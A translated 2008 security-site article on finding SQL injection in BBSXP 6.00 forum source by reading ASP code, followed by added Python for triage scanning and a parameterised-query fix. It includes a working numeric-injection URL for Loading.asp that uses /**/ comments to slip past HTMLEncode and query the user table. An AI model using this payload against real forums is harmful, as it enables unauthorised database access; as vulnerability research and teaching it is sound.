BBSXP: the latest vulnerability and how it was found - Vulnerability warning - Black Bar Safety Net

ID MYHACK58:62200819326
Type myhack58
Reporter Anonymous
Modified 2008-06-11T00:00:00


Operating environment: Macromedia Dreamweaver 8.0 + IIS 5.0 + SQL Server 2000 + BBSXP 6.00 SP1 (SQL version)

Looking back on how I found the new BBSXP vulnerability a few days ago, I want to use it to show a method for finding vulnerabilities in ASP programs. At this point you probably think of NBSI. NBSI is indeed a good tool for detecting and exploiting vulnerabilities, but it can only find simple vulnerabilities that follow a known pattern; in software-testing terms it is black-box testing. What I want to describe here is the white-box method: finding vulnerabilities by reading the source code, which turns up bugs with a much higher degree of certainty.

Before starting, pick a tool you are comfortable with; I use Dreamweaver 8.0. First create a site in DW. Some theory is needed here, so script kiddies should not get impatient this time: if you are, you will only ever remain a newbie. The aim is to get everyone out of the habit of knowing that something works without knowing why.

All ASP vulnerabilities come from failing to strictly check the data received from the client; the so-called numeric and character (string) vulnerabilities differ only in how the value is used inside the SQL query. In a program, all validation and conversion of the data happens between receiving it and executing the query, so our attention should go to the validation step between the data the client submits and the query statement it is spliced into. To simplify the search, we start from a few keywords and use Dreamweaver's search function to locate the places where a vulnerability might exist. In ASP, client data is received through the Request object, in one of these forms:

    Request("ForumID")
    Request.QueryString("ForumID")
    Request.Form("ForumID")
    Request.Cookies("ForumID")
Therefore we only need to search for the keyword Request. Files whose names contain Admin can be skipped, since an ordinary user cannot reach them. Double-clicking Bank.asp in the search results opens it in the edit window, where you can see the following code:

    qmoney=int(Request("qmoney"))
    if qmoney > Rs("UserMoney") then error("<li>You don't have that much cash!")
    if qmoney<1 then error("<li>Deposit can not be zero!")

    Rs("savemoney")=Rs("savemoney")+qmoney+accrual
    Rs("UserMoney")=Rs("UserMoney")-qmoney
    Rs("SaveMoneyTime")=now()
    Rs.update
    Rs.close

Here the int method converts the data, and the record is saved by assigning Recordset fields rather than by building a SQL string, so no vulnerability can arise. In fact either of these two measures alone is enough to rule out injection, so code that uses either of them can be ignored. Double-clicking Friends.asp in the search results shows the following code:

    Incept=HTMLEncode(Request("Incept"))
    UserName=HTMLEncode(Request("UserName"))

    sub add
    if UserName="" then error2("Please enter the name of the friend you want to add!")
    if UserName=CookieUserName then error2("You cannot add yourself!")
    If Conn.Execute("Select id From [BBSXP_Users] where UserName='"&UserName&"'").eof Then error2("This user does not exist in the database!")

From the query statement you can see that if the UserName variable contains a single quote, a character-type injection vulnerability results. So the UserName obtained from the client has to be filtered on its way into the spliced query, which is done here with the HTMLEncode method. That method is implemented as follows:

    function HTMLEncode(fString)
    'characters that matter to HTML or SQL are replaced by their HTML entities
    fString=Replace(fString,";","&#59;")
    fString=Replace(fString,"<","&lt;")
    fString=Replace(fString,">","&gt;")
    fString=Replace(fString,"\","&#92;")
    fString=Replace(fString,"--","&#45;&#45;")
    'whitespace and control characters
    fString=Replace(fString,CHR(9),"&nbsp;")
    fString=Replace(fString,CHR(10),"<br>")
    fString=Replace(fString,CHR(13),"")
    fString=Replace(fString,CHR(22),"&nbsp;")
    fString=Replace(fString,CHR(32),"&nbsp;")
    fString=Replace(fString,CHR(34),"&quot;") 'double quote
    fString=Replace(fString,CHR(39),"&#39;") 'single quote
    fString=ReplaceText(fString,"&#([0-9]);","&amp;#$1;") 'to solve the Korean characters problem
    if IsSqlDataBase=0 then 'filter katakana (Japanese characters) [\u30A0-\u30FF], by yuzi
    fString=escape(fString)
    fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")
    fString=unescape(fString)
    end if
    HTMLEncode=fString
    end function

Looking at this method, single quotes are clearly filtered (replaced by &#39;), so no character-type injection vulnerability arises here. Continue down through the search results: wherever you see a similar statement whose input is filtered with HTMLEncode, we can consider it safe.
There is also another fairly common situation, with code like the following:

    select case Request("menu")
    case "add": add
    case "bad": bad
    case "Del": Del
    case "Post": Post
    case "look": look
    case "loadLog": loadLog
    case "addPost": addPost
    case "": index
    end select

In this code the value of menu is never used in a query statement, so it cannot produce an injection vulnerability and can likewise be ignored. I have described a lot of code above that does not produce a vulnerability, and you must be eager to know what kind of code does. Have a little patience: after triaging the 702 search results using the cases above, only about a dozen remain. The next step is to find the code that can be exploited. Opening Loading.asp, the first search result, shows this code:

    id=int(Request("id"))
    ForumID=HTMLEncode(Request("ForumID"))
    if id="0" then
        if Request("ForumID")="0" then
            sql="select * from [BBSXP_UsersOnline] where UserName<>'' and eremite<>1"
        else
            sql="select * from [BBSXP_UsersOnline] where ForumID="&ForumID&" and UserName<>'' and eremite<>1"
        end if

Judging from the query, this code should have a numeric injection vulnerability. ForumID, however, is filtered with HTMLEncode, which means that apart from single quotes and a few other special characters, letters and common symbols pass through untouched. To confirm this idea I added the line Response.Write(sql) after this code for testing.
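The triage carried out by hand above (skip Admin pages, dismiss int()-converted values, dismiss HTMLEncode-filtered values that land between quotes, ignore values that never reach a query) can be written down as a small scanner. This is an added example, not part of the article or of BBSXP; the ASP fragments it scans are constructed to mirror the patterns discussed, and it deliberately rates an HTMLEncode-filtered value in a numeric comparison as high risk, because that is exactly the Loading.asp case.

```python
import re
# Constructed ASP fragments modelled on the patterns the article walks through
# (Bank.asp, Friends.asp, Loading.asp, the menu switch) plus an admin page;
# they are not BBSXP's real source.
SAMPLE_FILES = {
    "Bank.asp": 'qmoney=int(Request("qmoney"))\n'
                'if qmoney<1 then error("<li>Deposit can not be zero!")',
    "Friends.asp": 'UserName=HTMLEncode(Request("UserName"))\n'
                   'sql="Select id From [BBSXP_Users] where UserName=\'"&UserName&"\'"',
    "Loading.asp": 'ForumID=HTMLEncode(Request("ForumID"))\n'
                   'sql="select * from [BBSXP_UsersOnline] where ForumID="&ForumID&" and eremite<>1"',
    "Menu.asp": 'menu=Request("menu")\nselect case menu\ncase "add": add\nend select',
    "Admin_Users.asp": 'uid=Request("uid")\nsql="select * from [BBSXP_Users] where id="&uid&""',
}
# var = [int|HTMLEncode](Request[.QueryString|.Form|.Cookies]("param")
ASSIGN_RE = re.compile(
    r'(\w+)\s*=\s*(?:(int|HTMLEncode)\()?Request(?:\.\w+)?\s*\(\s*"(\w+)"\s*\)', re.I)

def sql_context(var, src):
    """'quoted' for ...='"&var&"'..., 'numeric' for ...="&var&"..., None if no query."""
    m = re.search(r'(.)"\s*&\s*' + re.escape(var) + r'\s*&\s*"', src)
    if m is None:
        return None
    return "quoted" if m.group(1) == "'" else "numeric"

def triage(files):
    """The article's manual triage as code: (file, param, wrapper, context, verdict)."""
    findings = []
    for name, src in files.items():
        if "admin" in name.lower():
            continue  # needs an admin login, so unreachable as an ordinary user
        for var, wrapper, param in ASSIGN_RE.findall(src):
            ctx = sql_context(var, src)
            if wrapper.lower() == "int":
                verdict = "ok: int() conversion"
            elif ctx is None:
                verdict = "ignore: not used in a query"
            elif wrapper.lower() == "htmlencode" and ctx == "quoted":
                verdict = "ok: quote is encoded"
            else:  # numeric splice without int(), or a quoted splice with no filter
                verdict = "HIGH: " + ("numeric context, HTMLEncode does not help"
                                      if ctx == "numeric" else "unfiltered string in query")
            findings.append((name, param, wrapper or "none", ctx, verdict))
    return findings

def verdicts(files):
    """Convenience view: {(file, param): verdict}."""
    return {name_param: verdict for *name_param, _, _, verdict in
            ((n, p, w, c, v) for n, p, w, c, v in triage(files))} if False else \
           {(n, p): v for n, p, _, _, v in triage(files)}
```

Run on real source with `triage({path: open(path, encoding="gbk").read() for path in glob("*.asp")})`; the regexes only catch the single-line assignment shape shown in the article, so values passed through several helper functions still need reading by hand.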
Entering the following URL:

    http://localhost/bbsxp/loading.asp?ForumID=0/**/select/**/username/**/from/**/bbsxp_user/**/select/**/*/**/from/**/bbsxp_usersonline/**/where/**/forumid=0

the otherwise blank page shows us the query statement we were after:

    select * from [BBSXP_UsersOnline] where ForumID=0/**/select/**/username/**/from/**/bbsxp_user/**/select/**/*/**/from/**/bbsxp_usersonline/**/where/**/forumid=0 and UserName<>'' and eremite<>1

This means the constructed statement has passed through the system's filtering. We can now replace select/**/username/**/from/**/bbsxp_user in the URL with any SQL query that contains no special characters. What comes next needs no explanation. Sometimes the query is not displayed directly on the page; in that case SQL Profiler can be used to monitor the queries being submitted.

Because forum security is generally fairly tight, finding vulnerabilities is usually a needle-in-a-haystack affair, and only by mastering some methods can the process be simplified to a degree. This article has been a brief account of the discovery process for what is, relatively speaking, an easy vulnerability. Perhaps BBSXP's revisions touched so much code that details like this were overlooked? More often, each variable received from the client passes through several methods before it is sent to the database, and such cases are harder to find and to test. But the principle does not change: once you have mastered the method, trying enough times will always turn something up, and you will gradually see that finding the needle in the haystack is not impossible. Finally, a parting remark: besides the vulnerability just described there is a less obvious one you can try to search for. I'll leave that problem to you; I believe you will find it yourselves!
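To see concretely why HTMLEncode leaves this query exposed and what the fix looks like, here is an added Python model (not BBSXP's code) of the replacement table quoted above, the Loading.asp concatenation, and a strict integer check with a parameterised query in place of the string splice. The table name and payload in the test are the constructed values from this article.

```python
import re

# Python model of the replacement table in BBSXP's HTMLEncode as quoted in the
# article; re-implemented here so the filter's behaviour can be tested offline.
HTMLENCODE_TABLE = [
    (";", "&#59;"), ("<", "&lt;"), (">", "&gt;"), ("\\", "&#92;"),
    ("--", "&#45;&#45;"), ("\t", "&nbsp;"), ("\n", "<br>"), ("\r", ""),
    (chr(22), "&nbsp;"), (" ", "&nbsp;"), ('"', "&quot;"), ("'", "&#39;"),
]

def html_encode(s):
    """Sequential Replace() calls, in the same order as the ASP function."""
    for old, new in HTMLENCODE_TABLE:
        s = s.replace(old, new)
    return s

def build_online_sql(forum_id_raw):
    """Loading.asp's pattern: the encoded value is spliced into a numeric
    comparison, so nothing here requires the value to actually be a number."""
    return ("select * from [BBSXP_UsersOnline] where ForumID=" + html_encode(forum_id_raw)
            + " and UserName<>'' and eremite<>1")

def statement_count(sql):
    """Number of SELECT keywords in the built query; more than one means the
    client-supplied value smuggled in its own statement (spaces are encoded,
    but /**/ is not, and SQL Server treats a comment as whitespace)."""
    return len(re.findall(r"\bselect\b", sql, re.I))

# Hardening: treat ForumID as a number, not as a string to be entity-encoded.
# This is the check the article credits Bank.asp's int(Request("qmoney")) with,
# made explicit: digits only, bounded length, and bound as a parameter.
FORUM_ID_RE = re.compile(r"[0-9]{1,9}")

def is_valid_forum_id(raw):
    return FORUM_ID_RE.fullmatch(raw) is not None

def build_online_sql_safe(forum_id_raw):
    """Return (parameterised SQL, argument tuple); reject anything non-numeric."""
    if not is_valid_forum_id(forum_id_raw):
        raise ValueError("ForumID must be a plain decimal integer")
    sql = ("select * from [BBSXP_UsersOnline] where ForumID=? "
           "and UserName<>'' and eremite<>1")
    return sql, (int(forum_id_raw),)
```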